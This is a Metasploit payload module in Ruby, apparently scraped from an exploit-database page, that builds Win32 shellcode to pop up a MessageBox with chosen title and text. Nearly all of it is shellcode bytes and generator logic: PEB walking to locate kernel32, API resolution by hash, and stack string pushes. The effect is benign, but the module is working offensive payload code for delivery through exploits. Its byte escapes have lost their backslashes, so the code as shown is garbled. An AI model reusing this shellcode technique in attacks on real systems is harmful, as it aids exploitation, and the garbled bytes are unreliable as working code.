[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Shellcode - Win32 MessageBox (Metasploit module)
# Published : 2010-03-24
# Author : corelanc0d3r
# Previous Title : win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes
# Next Title : JITed egg-hunter stage-0 shellcode
##
# $Id: messagebox.rb 4 2010-02-26 00:28:00:00Z corelanc0d3r & rick2600 $
##
#
# Installation instructions :
# Drop file in framework3/modules/payloads/singles/windows folder
#
# Usage : ./msfpayload windows/messagebox TITLE="Corelan" TEXT="Greetz to corelanc0d3r" P
#
require 'msf/core'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Messagebox with custom title and text',
'Version' => '$Revision: 4 $',
'Description' => 'Spawns MessageBox with a customizable title & text',
'Author' => [ 'corelanc0d3r - peter.ve[at]corelan.be',
'rick2600 - ricks2600[at]gmail.com' ],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => false,
'Payload' =>
{
'Offsets' => { },
'Payload' => "xd9xebx9bxd9x74x24xf4x31"+
"xd2xb2x7ax31xc9x64x8bx71"+
"x30x8bx76x0cx8bx76x1cx8b"+
"x46x08x8bx7ex20x8bx36x38"+
"x4fx18x75xf3x59x01xd1xff"+
"xe1x60x8bx6cx24x24x8bx45"+
"x3cx8bx54x05x78x01xeax8b"+
"x4ax18x8bx5ax20x01xebxe3"+
"x37x49x8bx34x8bx01xeex31"+
"xffx31xc0xfcxacx84xc0x74"+
"x0axc1xcfx0dx01xc7xe9xf1"+
"xffxffxffx3bx7cx24x28x75"+
"xdex8bx5ax24x01xebx66x8b"+
"x0cx4bx8bx5ax1cx01xebx8b"+
"x04x8bx01xe8x89x44x24x1c"+
"x61xc3xb2x08x29xd4x89xe5"+
"x89xc2x68x8ex4ex0execx52"+
"xe8x9cxffxffxffx89x45x04"+
"xbb"
}
))
# EXITFUNC : Only support Process and Thread :/
deregister_options('EXITFUNC')
# Register MessageBox options
register_options(
[
OptString.new('EXITFUNC', [ false,
"Only Process (default) or Thread are supported","process"]),
OptString.new('TITLE', [ true,
"Messagebox Title (max 255 chars)" ]),
OptString.new('TEXT', [ true,
"Messagebox Text" ])
], self.class)
end
#
# Constructs the payload
#
def generate
strExitFunc = datastore['EXITFUNC'] || "process"
strExitFuncHash = "x7exd8xe2x73" #ExitProcess()
strTitle = datastore['TITLE']
if (strTitle)
#ExitFunc
if (strExitFunc) then
strExitFunc=strExitFunc.downcase
if strExitFunc == "thread" then
strExitFuncHash="xEFxCExE0x60" #ExitThread()
end
end
#================Process Title==================================
strTitle=strTitle+"X"
iTitle=strTitle.length
if (iTitle < 256)
iNrLines=iTitle/4
iCheckChars = iNrLines * 4
strSpaces=""
iSniperTitle=iTitle-1
if iCheckChars != iTitle then
iTargetChars=(iNrLines+1)*4
while iTitle < iTargetChars
strSpaces+=" " #add space
iTitle+=1
end
end
strTitle=strTitle+strSpaces #title is now 4 byte aligned
#and string ends with X
#at index iSniperTitle
#push Title to stack
#start at back of string
strPushTitle=""
strLine=""
icnt=strTitle.length-1
icharcnt=0
while icnt >= 0
thisChar=strTitle[icnt,1]
strLine=thisChar+strLine
if icharcnt < 3
icharcnt+=1
else
strPushTitle=strPushTitle+"h"+strLine #h = 68 = push
strLine=""
icharcnt=0
end
icnt=icnt-1
end
#generate opcode to write null byte
strWriteTitleNull="x31xDBx88x5Cx24"
strWriteTitleNull += iSniperTitle.chr + "x89xe3"
#================Process Text===============================
#cut text into 4 byte push instructions
strText = datastore['TEXT']
strText=strText+"X"
iText=strText.length
iNrLines=iText/4
iCheckChars = iNrLines * 4
strSpaces=""
iSniperText=iText-1
if iCheckChars != iText then
iTargetChars=(iNrLines+1)*4
while iText < iTargetChars
strSpaces+=" " #add space
iText+=1
end
end
strText=strText+strSpaces #text is now 4 byte aligned
#and string ends with X
#at index iSniperTitle
#push Text to stack
#start at back of string
strPushText=""
strLine=""
icnt=strText.length-1
icharcnt=0
while icnt >= 0
thisChar=strText[icnt,1]
strLine=thisChar+strLine
if icharcnt < 3
icharcnt+=1
else
strPushText=strPushText+"h"+strLine #h = 68 = push
strLine=""
icharcnt=0
end
icnt=icnt-1
end
#generate opcode to write null byte
strWriteTextNull="x31xc9x88x4Cx24"
strWriteTextNull += iSniperText.chr + "x89xe1"
#build payload
payload_data = module_info['Payload']['Payload']
payload_data += strExitFuncHash
payload_data += "x87x1cx24"
payload_data += "x52xe8x8bxffxffxffx89x45"
payload_data += "x08x68x6cx6cx20xffx68x33"
payload_data += "x32x2ex64x68x75x73x65x72"
payload_data += "x88x5cx24x0ax89xe6x56xff"
payload_data += "x55x04x89xc2x50xbbxa8xa2"
payload_data += "x4dxbcx87x1cx24x52xe8x5e"
payload_data += "xffxffxff"
payload_data += strPushTitle + strWriteTitleNull
payload_data += strPushText + strWriteTextNull
payload_data += "x31xd2x52"
payload_data += "x53x51x52xffxd0x31xc0x50"
payload_data += "xffx55x08"
return payload_data
else
raise ArgumentError, "Title should be 255 characters or less"
end
end
end
end